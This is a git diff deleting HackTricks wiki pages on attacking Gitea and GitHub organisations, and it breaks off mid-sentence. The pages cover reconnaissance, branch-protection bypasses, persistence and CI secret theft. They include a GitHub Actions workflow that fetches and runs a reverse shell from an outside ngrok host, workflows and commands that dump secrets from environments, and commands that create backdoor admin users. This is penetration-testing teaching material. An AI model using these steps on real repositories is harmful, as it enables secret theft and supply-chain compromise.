information**](basic-gitea-information.md#personal-access-tokens). - -A user token can be used **instead of a password** to **authenticate** against Gitea server [**via API**](https://try.gitea.io/api/swagger#/). it will has **complete access** over the user. - -## With Oauth Application - -For an introduction about [**Gitea Oauth Applications check the basic information**](basic-gitea-information.md#oauth-applications). - -An attacker might create a **malicious Oauth Application** to access privileged data/actions of the users that accepts them probably as part of a phishing campaign. - -As explained in the basic information, the application will have **full access over the user account**. - -## Branch Protection Bypass - -In Github we have **github actions** which by default get a **token with write access** over the repo that can be used to **bypass branch protections**. In this case that **doesn't exist**, so the bypasses are more limited. But lets take a look to what can be done: - -* **Enable Push**: If anyone with write access can push to the branch, just push to it. -* **Whitelist Restricted Pus**h: The same way, if you are part of this list push to the branch. -* **Enable Merge Whitelist**: If there is a merge whitelist, you need to be inside of it -* **Require approvals is bigger than 0**: Then... you need to compromise another user -* **Restrict approvals to whitelisted**: If only whitelisted users can approve... you need to compromise another user that is inside that list -* **Dismiss stale approvals**: If approvals are not removed with new commits, you could hijack an already approved PR to inject your code and merge the PR. - -Note that **if you are an org/repo admin** you can bypass the protections. - -## Enumerate Webhooks - -**Webhooks** are able to **send specific gitea information to some places**. You might be able to **exploit that communication**.\ -However, usually a **secret** you can **not retrieve** is set in the **webhook** that will **prevent** external users that know the URL of the webhook but not the secret to **exploit that webhook**.\ -But in some occasions, people instead of setting the **secret** in its place, they **set it in the URL** as a parameter, so **checking the URLs** could allow you to **find secrets** and other places you could exploit further. - -Webhooks can be set at **repo and at org level**. - -# Post Exploitation - -## Inside the server - -If somehow you managed to get inside the server where gitea is running you should search for the gitea configuration file. By default it's located in `/data/gitea/conf/app.ini` - -In this file you can find **keys** and **passwords**. - -In the gitea path (by default: /data/gitea) you can find also interesting information like: - -* The **sqlite** DB: If gitea is not using an external db it will use a sqlite db -* The **sessions** inside the sessions folder: Running `cat sessions/*/*/*` you can see the usernames of the logged users (gitea could also save the sessions inside the DB). -* The **jwt private key** inside the jwt folder -* More **sensitive information** could be found in this folder - -If you are inside the server you can also **use the `gitea` binary** to access/modify information: - -* `gitea dump` will dump gitea and generate a .zip file -* `gitea generate secret INTERNAL_TOKEN/JWT_SECRET/SECRET_KEY/LFS_JWT_SECRET` will generate a token of the indicated type (persistence) -* `gitea admin user change-password --username admin --password newpassword` Change the password -* `gitea admin user create --username newuser --password superpassword --email user@user.user --admin --access-token` Create new admin user and get an access token - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/gitea-security/basic-gitea-information.md b/cloud-security/gitea-security/basic-gitea-information.md deleted file mode 100644 index 3707e7bc5..000000000 --- a/cloud-security/gitea-security/basic-gitea-information.md +++ /dev/null @@ -1,133 +0,0 @@ -# Basic Gitea Information - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- -## Basic Structure - -The basic gitea environment structure is to group repos by **organization(s),** each of them may contain **several repositories** and **several teams.** However, note that just like in github users can have repos outside of the organization. - -Moreover, a **user** can be a **member** of **different organizations**. Within the organization the user may have **different permissions over each repository**. - -A user may also be **part of different teams** with different permissions over different repos. - -And finally **repositories may have special protection mechanisms**. - -## Permissions - -### Organizations - -When an **organization is created** a team called **Owners** is **created** and the user is put inside of it. This team will give **admin access** over the **organization**, those **permissions** and the **name** of the team **cannot be modified**. - -**Org admins** (owners) can select the **visibility** of the organization: - -* Public -* Limited (logged in users only) -* Private (members only) - -**Org admins** can also indicate if the **repo admins** can **add and or remove access** for teams. They can also indicate the max number of repos. - -When creating a new team, several important settings are selected: - -* It's indicated the **repos of the org the members of the team will be able to access**: specific repos (repos where the team is added) or all. -* It's also indicated **if members can create new repos** (creator will get admin access to it) -* The **permissions** the **members** of the repo will **have**: - * **Administrator** access - * **Specific** access: - -![](<../../.gitbook/assets/image (648) (1).png>) - -### Teams & Users - -In a repo, the **org admin** and the **repo admins** (if allowed by the org) can **manage the roles** given to collaborators (other users) and teams. There are **3** possible **roles**: - -* Administrator -* Write -* Read - -## Gitea Authentication - -### Web Access - -Using **username + password** and potentially (and recommended) a 2FA. - -### **SSH Keys** - -You can configure your account with one or several public keys allowing the related **private key to perform actions on your behalf.** [http://localhost:3000/user/settings/keys](http://localhost:3000/user/settings/keys) - -#### **GPG Keys** - -You **cannot impersonate the user with these keys** but if you don't use it it might be possible that you **get discover for sending commits without a signature**. - -### **Personal Access Tokens** - -You can generate personal access token to **give an application access to your account**. A personal access token gives full access over your account: [http://localhost:3000/user/settings/applications](http://localhost:3000/user/settings/applications) - -### Oauth Applications - -Just like personal access tokens **Oauth applications** will have **complete access** over your account and the places your account has access because, as indicated in the [docs](https://docs.gitea.io/en-us/oauth2-provider/#scopes), scopes aren't supported yet: - -![](<../../.gitbook/assets/image (662) (1).png>) - -### Deploy keys - -Deploy keys might have read-only or write access to the repo, so they might be interesting to compromise specific repos. - -## Branch Protections - -Branch protections are designed to **not give complete control of a repository** to the users. The goal is to **put several protection methods before being able to write code inside some branch**. - -The **branch protections of a repository** can be found in _https://localhost:3000/\/\/settings/branches_ - -{% hint style="info" %} -It's **not possible to set a branch protection at organization level**. So all of them must be declared on each repo. -{% endhint %} - -Different protections can be applied to a branch (like to master): - -* **Disable Push**: No-one can push to this branch -* **Enable Push**: Anyone with access can push, but not force push. -* **Whitelist Restricted Push**: Only selected users/teams can push to this branch (but no force push) -* **Enable Merge Whitelist**: Only whitelisted users/teams can merge PRs. -* **Enable Status checks:** Require status checks to pass before merging. -* **Require approvals**: Indicate the number of approvals required before a PR can be merged. -* **Restrict approvals to whitelisted**: Indicate users/teams that can approve PRs. -* **Block merge on rejected reviews**: If changes are requested, it cannot be merged (even if the other checks pass) -* **Block merge on official review requests**: If there official review requests it cannot be merged -* **Dismiss stale approvals**: When new commits, old approvals will be dismissed. -* **Require Signed Commits**: Commits must be signed. -* **Block merge if pull request is outdated** -* **Protected/Unprotected file patterns**: Indicate patterns of files to protect/unprotect against changes - -{% hint style="info" %} -As you can see, even if you managed to obtain some credentials of a user, **repos might be protected avoiding you to pushing code to master** for example to compromise the CI/CD pipeline. -{% endhint %} - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
diff --git a/cloud-security/github-security/README.md b/cloud-security/github-security/README.md deleted file mode 100644 index b2defdc31..000000000 --- a/cloud-security/github-security/README.md +++ /dev/null @@ -1,324 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -# What is Github - -(From [here](https://kinsta.com/knowledgebase/what-is-github/)) At a high level, **GitHub is a website and cloud-based service that helps developers store and manage their code, as well as track and control changes to their code**. - -## Basic Information - -{% content-ref url="basic-github-information.md" %} -[basic-github-information.md](basic-github-information.md) -{% endcontent-ref %} - -# External Recon - -Github repositories can be configured as public, private and internal. - -* **Private** means that **only** people of the **organisation** will be able to access them -* **Internal** means that **only** people of the **enterprise** (an enterprise may have several organisations) will be able to access it -* **Public** means that **all internet** is going to be able to access it. - -In case you know the **user, repo or organisation you want to target** you can use **github dorks** to find sensitive information or search for **sensitive information leaks** **on each repo**. - -## Github Dorks - -Github allows to **search for something specifying as scope a user, a repo or an organisation**. Therefore, with a list of strings that are going to appear close to sensitive information you can easily **search for potential sensitive information in your target**. - -Tools (each tool contains its list of dorks): - -* [https://github.com/obheda12/GitDorker](https://github.com/obheda12/GitDorker) ([Dorks list](https://github.com/obheda12/GitDorker/tree/master/Dorks)) -* [https://github.com/techgaun/github-dorks](https://github.com/techgaun/github-dorks) ([Dorks list](https://github.com/techgaun/github-dorks/blob/master/github-dorks.txt)) -* [https://github.com/hisxo/gitGraber](https://github.com/hisxo/gitGraber) ([Dorks list](https://github.com/hisxo/gitGraber/tree/master/wordlists)) - -## Github Leaks - -Please, note that the github dorks are also meant to search for leaks using github search options. This section is dedicated to those tools that will **download each repo and search for sensitive information in them** (even checking certain depth of commits). - -Tools (each tool contains its list of regexes): - -* [https://github.com/zricethezav/gitleaks](https://github.com/zricethezav/gitleaks) -* [https://github.com/trufflesecurity/truffleHog](https://github.com/trufflesecurity/truffleHog) -* [https://github.com/eth0izzle/shhgit](https://github.com/eth0izzle/shhgit) -* [https://github.com/michenriksen/gitrob](https://github.com/michenriksen/gitrob) -* [https://github.com/anshumanbh/git-all-secrets](https://github.com/anshumanbh/git-all-secrets) -* [https://github.com/kootenpv/gittyleaks](https://github.com/kootenpv/gittyleaks) -* [https://github.com/awslabs/git-secrets](https://github.com/awslabs/git-secrets) - -# Internal Recon & Attacks - -For this scenario we are going to suppose that you have obtained some access to a github account. - -## With User Credentials - -If you somehow already have credentials for a user inside an organization you can **just login** and check which **enterprise and organization roles you have**, if you are a raw member, check which **permissions raw members have**, in which **groups** you are, which **permissions you have** over which **repos,** and **how are the repos protected.** - -Note that **2FA may be used** so you will only be able to access this information if you can also **pass that check**. - -{% hint style="info" %} -Note that if you **manage to steal the `user_session` cookie** (currently configured with SameSite: Lax) you can **completely impersonate the user** without needing credentials or 2FA. -{% endhint %} - -Check the section below about [**branch protections bypasses**](./#branch-protection-bypass) in case it's useful. - -## With User SSH Key - -Github allows **users** to set **SSH keys** that will be used as **authentication method to deploy code** on their behalf (no 2FA is applied). - -With this key you can perform **changes in repositories where the user has some privileges**, however you can not user it to access github api to enumerate the environment. However, you can **enumerate local settings** to get information about the repos and user you have access to: - -```bash -# Go to the the repository folder -# Get repo config and current user name and email -git config --list -``` - -If the user has configured its username as his github username you can access the **public keys he has set** in his account in _https://github.com/\.keys_, you could check this to confirm the private key you found can be used. - -**SSH keys** can also be set in repositories as **deploy keys**. Anyone with access to this key will be able to **launch projects from a repository**. Usually in a server with different deploy keys the local file **`~/.ssh/config`** will give you info about key is related. - -### GPG Keys - -As explained [**here**](basic-github-information.md#ssh-keys) sometimes it's needed to sign the commits or you might get discovered. - -Check locally if the current user has any key with: - -```shell -gpg --list-secret-keys --keyid-format=long -``` - -## With User Token - -For an introduction about [**User Tokens check the basic information**](basic-github-information.md#personal-access-tokens). - -A user token can be used **instead of a password** for Git over HTTPS, or can be used to [**authenticate to the API over Basic Authentication**](https://docs.github.com/v3/auth/#basic-authentication). Depending on the privileges attached to it you might be able to perform different actions. - -A User token looks like this: `ghp_EfHnQFcFHX6fGIu5mpduvRiYR584kK0dX123` - -## With Oauth Application - -For an introduction about [**Github Oauth Applications check the basic information**](basic-github-information.md#oauth-applications). - -An attacker might create a **malicious Oauth Application** to access privileged data/actions of the users that accepts them probably as part of a phishing campaign. - -These are the [scopes an Oauth application can request](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps). A should always check the scopes requested before accepting them. - -Moreover, as explained in the basic information, **organizations can give/deny access to third party applications** to information/repos/actions related with the organisation. - -## With Github Application - -For an introduction about [**Github Applications check the basic information**](basic-github-information.md#github-applications). - -An attacker might create a **malicious Github Application** to access privileged data/actions of the users that accepts them probably as part of a phishing campaign. - -Moreover, as explained in the basic information, **organizations can give/deny access to third party applications** to information/repos/actions related with the organisation. - -## Enumerate Webhooks - -**Webhooks** are able to **send specific gitea information to some places**. You might be able to **exploit that communication**.\ -However, usually a **secret** you can **not retrieve** is set in the **webhook** that will **prevent** external users that know the URL of the webhook but not the secret to **exploit that webhook**.\ -But in some occasions, people instead of setting the **secret** in its place, they **set it in the URL** as a parameter, so **checking the URLs** could allow you to **find secrets** and other places you could exploit further. - -Webhooks can be set at **repo and at org level**. - -## With Malicious Github Action - -For an introduction about [**Github Actions check the basic information**](basic-github-information.md#git-actions). - -In case you can **execute arbitrary github actions** in a **repository**, you can **steal the secrets from that repo**. - -### Github Action Execution from Repo Creation - -In case members of an organization can **create new repos** and you can execute github actions, you can **create a new repo and steal the secrets set at organization level**. - -### Github Action from a New Branch - -If you can **create a new branch in a repository that already contains a Github Action** configured, you can **modify** it, **upload** the content, and then **execute that action from the new branch**. This way you can **exfiltrate repository and organization level secrets** (but you need to know how they are called). - -You can make the modified action executable **manually,** when a **PR is created** or when **some code is pushed** (depending on how noisy you want to be): - -```yaml -on: - workflow_dispatch: # Launch manually - pull_request: #Run it when a PR is created to a branch - branches: - - master - push: # Run it when a push is made to a branch - branches: - - current_branch_name - -# Use '**' instead of a branh name to trigger the action in all the cranches -``` - -### Github Action Injection/Backdoor - -In case you somehow managed to **infiltrate inside a Github Action**, if you can escalate privileges you can **steal secrets from the processes where secrets have been set in**. In some cases you don't even need to escalate privileges. - -```bash -cat /proc//environ -cat /proc/*/environ | grep -i secret #Suposing the env variable name contains "secret" -``` - -### GITHUB\_TOKEN - -This "**secret**" (coming from `${{ secrets.GITHUB_TOKEN }}` and `${{ github.token }}`) is given by default read and **write permissions** **to the repo**. This token is the same one a **Github Application will use**, so it can access the same endpoints: [https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps) - -You can see the possible **permissions** of this token in: [https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github\_token](https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github\_token) - -These tokens looks like this: `ghs_veaxARUji7EXszBMbhkr4Nz2dYz0sqkeiur7` - -Some interesting things you can do with this token: - -```bash -# Merge PR -curl -X PUT \ - https://api.github.com/repos///pulls//merge \ - -H "Accept: application/vnd.github.v3+json" \ - --header "authorization: Bearer $GITHUB_TOKEN" \ - --header 'content-type: application/json' \ - -d '{"commit_title":"commit_title"}' - -# Approve a PR -curl -X POST \ - https://api.github.com/repos///pulls//reviews \ - -H "Accept: application/vnd.github.v3+json" \ - --header "authorization: Bearer $GITHUB_TOKEN" \ - --header 'content-type: application/json' \ - -d '{"event":"APPROVE"}' - -# Create a PR -curl -X POST \ - -H "Accept: application/vnd.github.v3+json" \ - --header "authorization: Bearer $GITHUB_TOKEN" \ - --header 'content-type: application/json' \ - https://api.github.com/repos///pulls \ - -d '{"head":"","base":"master", "title":"title"}' -``` - -{% hint style="danger" %} -Note that in several occasions you will be able to find **github user tokens inside Github Actions envs or in the secrets**. These tokens may give you more privileges over the repository and organization. -{% endhint %} - -### List secrets in Github Action output - -```yaml -name: list_env -on: - workflow_dispatch: # Launch manually - pull_request: #Run it when a PR is created to a branch - branches: - - '**' - push: # Run it when a push is made to a branch - branches: - - '**' -jobs: - List_env: - runs-on: ubuntu-latest - steps: - - name: List Env - # Need to base64 encode or github will change the secret value for "***" - run: sh -c 'env | grep "secret_" | base64 -w0' - env: - secret_myql_pass: ${{secrets.MYSQL_PASSWORD}} - secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}} -``` - -### Get reverse shell with secrets - -```yaml -name: revshell -on: - workflow_dispatch: # Launch manually - pull_request: #Run it when a PR is created to a branch - branches: - - '**' - push: # Run it when a push is made to a branch - branches: - - '**' -jobs: - create_pull_request: - runs-on: ubuntu-latest - steps: - - name: Get Rev Shell - run: sh -c 'curl https://reverse-shell.sh/2.tcp.ngrok.io:15217 | sh' - env: - secret_myql_pass: ${{secrets.MYSQL_PASSWORD}} - secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}} -``` - -## Branch Protection Bypass - -* **Require a number of approvals**: If you compromised several accounts you might just accept your PRs from other accounts. If you just have the account from where you created the PR you cannot accept your own PR. However, if you have access to a **Github Action** environment inside the repo, using the **GITHUB\_TOKEN** you might be able to **approve your PR** and get 1 approval this way. - * _Note for this and for the Code Owners restriction that usually a user won't be able to approve his own PRs, but if you are, you can abuse it to accept your PRs._ -* **Dismiss approvals when new commits are pushed**: If this isn’t set, you can submit legit code, wait till someone approves it, and put malicious code and merge it into the protected branch. -* **Require reviews from Code Owners**: If this is activated and you are a Code Owner, you could make a **Github Action create your PR and then approve it yourself**. - * When a **CODEOWNER file is missconfigured** Github doesn't complain but it does't use it. Therefore, if it's missconfigured it's **Code Owners protection isn't applied.** -* **Allow specified actors to bypass pull request requirements**: If you are one of these actors you can bypass pull request protections. -* **Include administrators**: If this isn’t set and you are admin of the repo, you can bypass this branch protections. -* **PR Hijacking**: You could be able to **modify the PR of someone else** adding malicious code, approving the resulting PR yourself and merging everything. -* **Removing Branch Protections**: If you are an **admin of the repo you can disable the protections**, merge your PR and set the protections back. -* **Bypassing push protections**: If a repo **only allows certain users** to send push (merge code) in branches (the branch protection might be protecting all the branches specifying the wildcard `*`). - * If you have **write access over the repo but you are not allowed to push code** because of the branch protection, you can still **create a new branch** and within it create a **github action that is triggered when code is pushed**. As the **branch protection won't protect the branch until it's created**, this first code push to the branch will **execute the github action**. - -## Bypass Environments Protections - -For an introduction about [**Github Environment check the basic information**](basic-github-information.md#git-environments). - -In case an environment can be **accessed from all the branches**, it's **isn't protected** and you can easily access the secrets inside the environment. Note that you might find repos where **all the branches are protected** (by specifying its names or by using `*`) in that scenario, **find a branch were you can push code** and you can **exfiltrate** the secrets creating a new github action (or modifying one). - -Note, that you might find the edge case where **all the branches are protected** (via wildcard `*`) it's specified **who can push code to the branches** (_you can specify that in the branch protection_) and **your user isn't allowed**. You can still run a custom github action because you can create a branch and use the push trigger over itself. The **branch protection allows the push to a new branch so the github action will be triggered**. - -```yaml - push: # Run it when a push is made to a branch - branches: - - current_branch_name #Use '**' to run when a push is made to any branch -``` - -Note that **after the creation** of the branch the **branch protection will apply to the new branch** and you won't be able to modify it, but for that time you will have already dumped the secrets. - -# Persistence - -* Generate **user token** -* Steal **github tokens** from **secrets** - * **Deletion** of workflow **results** and **branches** -* Give **more permissions to all the org** -* Create **webhooks** to exfiltrate information -* Invite **outside collaborators** -* **Remove** **webhooks** used by the **SIEM** -* Create/modify **Github Action** with a **backdoor** -* Find v**ulnerable Github Action to command injection** via **secret** value modification - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/github-security/basic-github-information.md b/cloud-security/github-security/basic-github-information.md deleted file mode 100644 index 200459f9c..000000000 --- a/cloud-security/github-security/basic-github-information.md +++ /dev/null @@ -1,297 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -# Basic Structure - -The basic github environment structure of a big **company** is to own an **enterprise** which owns **several organizations** and each of them may contain **several repositories** and **several teams.**. Smaller companies may just **own one organization and no enterprises**. - -From a user point of view a **user** can be a **member** of **different enterprises and organizations**. Within them the user may have **different enterprise, organization and repository roles**. - -Moreover, a user may be **part of different teams** with different enterprise, organization or repository roles. - -And finally **repositories may have special protection mechanisms**. - -# Privileges - -## Enterprise Roles - -* **Enterprise owner**: People with this role can **manage administrators, manage organizations within the enterprise, manage enterprise settings, enforce policy across organizations**. However, they **cannot access organization settings or content** unless they are made an organization owner or given direct access to an organization-owned repository -* **Enterprise members**: Members of organizations owned by your enterprise are also **automatically members of the enterprise**. - -## Organization Roles - -In an organisation users can have different roles: - -* **Organization owners**: Organization owners have **complete administrative access to your organization**. This role should be limited, but to no less than two people, in your organization. -* **Organization members**: The **default**, non-administrative role for **people in an organization** is the organization member. By default, organization members **have a number of permissions**. -* **Billing managers**: Billing managers are users who can **manage the billing settings for your organization**, such as payment information. -* **Security Managers**: It's a role that organization owners can assign to any team in an organization. When applied, it gives every member of the team permissions to **manage security alerts and settings across your organization, as well as read permissions for all repositories** in the organization. - * If your organization has a security team, you can use the security manager role to give members of the team the least access they need to the organization. -* **Github App managers**: To allow additional users to **manage GitHub Apps owned by an organization**, an owner can grant them GitHub App manager permissions. -* **Outside collaborators**: An outside collaborator is a person who has **access to one or more organization repositories but is not explicitly a member** of the organization. - -You can **compare the permissions** of these roles in this table: [https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles](https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles) - -## Members Privileges - -In _https://github.com/organizations/\/settings/member\_privileges_ you can see the **permissions users will have just for being part of the organisation**. - -The settings here configured will indicate the following permissions of members of the organisation: - -* Be admin, writer, reader or no permission over all the organisation repos. -* If members can create private, internal or public repositories. -* If forking of repositories is possible -* If it's possible to invite outside collaborators -* If public or private sites can be published -* The permissions admins has over the repositories -* If members can create new teams - -## Repository Roles - -By default repository roles are created: - -* **Read**: Recommended for **non-code contributors** who want to view or discuss your project -* **Triage**: Recommended for **contributors who need to proactively manage issues and pull requests** without write access -* **Write**: Recommended for contributors who **actively push to your project** -* **Maintain**: Recommended for **project managers who need to manage the repository** without access to sensitive or destructive actions -* **Admin**: Recommended for people who need **full access to the project**, including sensitive and destructive actions like managing security or deleting a repository - -You can **compare the permissions** of each role in this table [https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role](https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role) - -You can also **create your own roles** in _https://github.com/organizations/\/settings/roles_ - -## Teams - -You can **list the teams created in an organization** in _https://github.com/orgs/\/teams_. Note that to see the teams which are children of other teams you need to access each parent team. - -![](<../../.gitbook/assets/image (630) (1).png>) - -## Users - -The users of an organization can be **listed** in _https://github.com/orgs/\/people._ - -In the information of each user you can see the **teams the user is member of**, and the **repos the user has access to**. - -# Github Authentication - -Github offers different ways to authenticate to your account and perform actions on your behalf. - -## Web Access - -Accessing **github.com** you can login using your **username and password** (and a **2FA potentially**). - -## **SSH Keys** - -You can configure your account with one or several public keys allowing the related **private key to perform actions on your behalf.** [https://github.com/settings/keys](https://github.com/settings/keys) - -### **GPG Keys** - -You **cannot impersonate the user with these keys** but if you don't use it it might be possible that you **get discover for sending commits without a signature**. Learn more about [vigilant mode here](https://docs.github.com/en/authentication/managing-commit-signature-verification/displaying-verification-statuses-for-all-of-your-commits#about-vigilant-mode). - -## **Personal Access Tokens** - -You can generate personal access token to **give an application access to your account**. When creating a personal access token the **user** needs to **specify** the **permissions** to **token** will have. [https://github.com/settings/tokens](https://github.com/settings/tokens) - -## Oauth Applications - -Oauth applications may ask you for permissions **to access part of your github information or to impersonate you** to perform some actions. A common example of this functionality is the **login with github button** you might find in some platforms. - -* You can **create** your own **Oauth applications** in [https://github.com/settings/developers](https://github.com/settings/developers) -* You can see all the **Oauth applications that has access to your account** in [https://github.com/settings/applications](https://github.com/settings/applications) -* You can see the **scopes that Oauth Apps can ask for** in [https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps) -* You can see third party access of applications in an **organization** in _https://github.com/organizations/\/settings/oauth\_application\_policy_ - -Some **security recommendations**: - -* An **OAuth App** should always **act as the authenticated GitHub user across all of GitHub** (for example, when providing user notifications) and with access only to the specified scopes.. -* An OAuth App can be used as an identity provider by enabling a "Login with GitHub" for the authenticated user. -* **Don't** build an **OAuth App** if you want your application to act on a **single repository**. With the `repo` OAuth scope, OAuth Apps can **act on \_all**\_\*\* of the authenticated user's repositorie\*\*s. -* **Don't** build an OAuth App to act as an application for your **team or company**. OAuth Apps authenticate as a **single user**, so if one person creates an OAuth App for a company to use, and then they leave the company, no one else will have access to it. -* **More** in [here](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-oauth-apps). - -## Github Applications - -Github applications can ask for permissions to **access your github information or impersonate you** to perform specific actions over specific resources. In Github Apps you need to specify the repositories the app will have access to. - -* To install a GitHub App, you must be an **organisation owner or have admin permissions** in a repository. -* The GitHub App should **connect to a personal account or an organisation**. -* You can create your own Github application in [https://github.com/settings/apps](https://github.com/settings/apps) -* You can see all the **Github applications that has access to your account** in [https://github.com/settings/apps/authorizations](https://github.com/settings/apps/authorizations) -* These are the **API Endpoints for Github Applications** [https://docs.github.com/en/rest/overview/endpoints-available-for-github-app](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps). Depending on the permissions of the App it will be able to access some of them -* You can see installed apps in an **organization** in _https://github.com/organizations/\/settings/installations_ - -Some security recommendations: - -* A GitHub App should **take actions independent of a user** (unless the app is using a [user-to-server](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps#user-to-server-requests) token). To keep user-to-server access tokens more secure, you can use access tokens that will expire after 8 hours, and a refresh token that can be exchanged for a new access token. For more information, see "[Refreshing user-to-server access tokens](https://docs.github.com/en/apps/building-github-apps/refreshing-user-to-server-access-tokens)." -* Make sure the GitHub App integrates with **specific repositories**. -* The GitHub App should **connect to a personal account or an organisation**. -* Don't expect the GitHub App to know and 